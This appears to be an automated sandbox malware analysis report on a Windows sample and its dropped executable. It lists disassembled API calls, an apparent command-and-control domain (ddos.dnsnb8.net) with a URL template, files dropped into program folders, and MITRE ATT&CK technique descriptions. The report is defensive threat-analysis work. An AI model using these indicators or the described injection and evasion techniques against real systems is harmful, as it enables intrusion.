Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-857537036
Opcode ID: 1876e7839d33a5a95912eba873930ab25668d8670909cd794304409bcc47f005
Instruction ID: 31eeb2775bcf7a8e0e4a8fc065f68448784a32aed8c5cce0a0b5095441c126ff
Opcode Fuzzy Hash: 1876e7839d33a5a95912eba873930ab25668d8670909cd794304409bcc47f005
Instruction Fuzzy Hash: 8121D031706711ABDBA0DB65CC0CB6BBAACFB89B20F000928F645E72D0C770DA44C7A5

Function 0080185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
srand.MSVCRT ref: 00801878
rand.MSVCRT ref: 00801880
srand.MSVCRT ref: 00801890
rand.MSVCRT ref: 00801894

Strings

http://%s:%d/%s/%s, xrefs: 00801860
ddos.dnsnb8.net, xrefs: 00801862

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: 51e7b0ddc243be47fe200c5895851f14ef86561b76b2d26b4ca739926186617b
Instruction ID: 6effb058e2e92fa86c74199701ab48090d40e04175766b853b44d5b31c705207
Opcode Fuzzy Hash: 51e7b0ddc243be47fe200c5895851f14ef86561b76b2d26b4ca739926186617b
Instruction Fuzzy Hash: D0E09A77A00218BFEB10A7A9EC4689EBBACEE84161B100536F600E3250E970E9448AB4

Function 00802692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,008029DB,?,00000001), ref: 008026A7
WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,008029DB,?,00000001), ref: 008026B5
lstrlen.KERNEL32(?), ref: 008026C4
??2@YAPAXI@Z.MSVCRT ref: 008026CE
lstrcpy.KERNEL32(00000004,?), ref: 008026E3
lstrcpy.KERNEL32(?,00000004), ref: 0080271F
??3@YAXPAX@Z.MSVCRT ref: 0080272D
SetEvent.KERNEL32 ref: 0080273C

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: d63b83571eb8aa6c5fa500949e2b2a493c066b69f8f9afdca0a8ba44beb65ed8
Instruction ID: 32098290a9f01d2890d462f6a4136a674e581f091cc30611cd51ffe1d2875087
Opcode Fuzzy Hash: d63b83571eb8aa6c5fa500949e2b2a493c066b69f8f9afdca0a8ba44beb65ed8
Instruction Fuzzy Hash: 6B11BFB6541610EFDBF1AF18EC4C85A7BADFB847207108016F958C71A0D7B08D95CB50

Function 00801B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00801BCD
rand.MSVCRT ref: 00801BD8
memset.MSVCRT ref: 00801C43
memcpy.MSVCRT ref: 00801C4F
lstrcat.KERNEL32(?,.exe), ref: 00801C5D

Strings

eQLsXIEKBAzMqufAqmnSdHDcupvdFZEXtoozLOocNHnrBGrjQVsRJVaCKwTryyhWwOsmDPvTjSpWzxgSIpUINilYNUPQfRdmcAJGqbgLJPtbxkFujeeyZYlnaCMOXEDCZUHMTWxaBkktgGvVhhifRbYFwliK, xrefs: 00801B8A, 00801B9C, 00801C15, 00801C49
.exe, xrefs: 00801C57

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$eQLsXIEKBAzMqufAqmnSdHDcupvdFZEXtoozLOocNHnrBGrjQVsRJVaCKwTryyhWwOsmDPvTjSpWzxgSIpUINilYNUPQfRdmcAJGqbgLJPtbxkFujeeyZYlnaCMOXEDCZUHMTWxaBkktgGvVhhifRbYFwliK
API String ID: 122620767-4089773766
Opcode ID: c212c31ee817451024e9ef036f532a87a8c444d2eb3cf912232ed488b836ddf7
Instruction ID: c963e71642f9c1ecec6e52414f2f46277c71154bf739d9aa7152fd49d470521d
Opcode Fuzzy Hash: c212c31ee817451024e9ef036f532a87a8c444d2eb3cf912232ed488b836ddf7
Instruction Fuzzy Hash: 6521BE72E842906EF7E52339AC58B693F44FFE3731F1540A9FE818B1D2D2A409819260

Function 0080189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 008018B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 008018D3
CloseHandle.KERNEL32(00802549), ref: 008018E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 008018F0
GetExitCodeProcess.KERNEL32(?,00802549), ref: 00801901
CloseHandle.KERNEL32(?), ref: 0080190A

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 7bc1977c267def97537742ecbf34040a46d78247ba7d3192abf774bb1ec359c2
Instruction ID: 8d0cbea373727bfe3732c3743ed55f92312911e16f125fdeae3467dc3daff8b2
Opcode Fuzzy Hash: 7bc1977c267def97537742ecbf34040a46d78247ba7d3192abf774bb1ec359c2
Instruction Fuzzy Hash: C8015A72901128BBCB21AB96DC48DDFBF7DFF85730F104121FA15A51A0D6714A18CAA0

Function 00801319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00801334
GetProcAddress.KERNEL32(00000000), ref: 0080133B
memset.MSVCRT ref: 00801359

Strings

ntdll.dll, xrefs: 0080132F
NtSystemDebugControl, xrefs: 0080132A

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 5ccc5efef6b8b74aba0d80b38871eec96dc7341398e2d3237d4938b0ae5c668a
Instruction ID: 3e4964bb8c0bb12dd1f9238a5b82ac19caaea76d69f2eea8933e03ba6e356177
Opcode Fuzzy Hash: 5ccc5efef6b8b74aba0d80b38871eec96dc7341398e2d3237d4938b0ae5c668a
Instruction Fuzzy Hash: 84016D71A41309AFDF90DF98AC8996FBBACFB55324F00412AF941E22A0E3749605CA51

Function 00801DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00801E0B
lstrcpy.KERNEL32(?,00000001), ref: 00801E1C
strrchr.MSVCRT ref: 00801E2B
lstrcmpiA.KERNEL32(?,00804488), ref: 00801E48
lstrlen.KERNEL32(00804488), ref: 00801E53

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 6517d9f2181e4e98b05b5fdb68c974a9c91bbb981785db9098b74e7eb67b964d
Instruction ID: e0e62f1be53640881ff542fe5cf2130b208df4aa1f8204eb4ac42b0b21c061f2
Opcode Fuzzy Hash: 6517d9f2181e4e98b05b5fdb68c974a9c91bbb981785db9098b74e7eb67b964d
Instruction Fuzzy Hash: 2801F9B39046196FEF605760EC4CBDA77DCFF04364F440066EB45E30D0EA74AA848BA4

Function 00806014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0080603C
GetProcAddress.KERNEL32(00000000,00806064), ref: 0080604F

Strings

kernel32.dll, xrefs: 0080603B

Memory Dump Source

Source File: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: fc510d1d61dab6fdb58505a58a0f8fdfa8cc353536f35edb16b6ed3a417f68f4
Instruction ID: f729831abdd1eedde1a9005ba2d7703c20f1b14efc9c4416d3d07891dbfe61bc
Opcode Fuzzy Hash: fc510d1d61dab6fdb58505a58a0f8fdfa8cc353536f35edb16b6ed3a417f68f4
Instruction Fuzzy Hash: 73F0F6F11406898FEFB08E64CC44BDE37E4FF05710F50442AE909CB281DB3486658B18

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1hdqYXYJkr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1hdqYXYJkr.exe_daa64bb1a2bf612b38b7f7aa812fc6a444b21_2bdd8500_db3022ad-b317-4e1c-8e29-ab1542d0debd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oQmD.exe_255a301624dc5569e9d7286780ab2f8150a4729b_c31cdb9f_3aee8d14-b12e-4a74-89dc-f6558bf00748\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BF2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D1C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D3C.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB98.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE7.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

C:\Users\user\AppData\Local\Temp\2E8258C9.exe

C:\Users\user\AppData\Local\Temp\oQmD.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

Windows Analysis Report
1hdqYXYJkr.exe

Function 009FF044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 0096BAC7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Function 009583AE Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19
libraryloaderCOMMON

Function 0095BD42 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre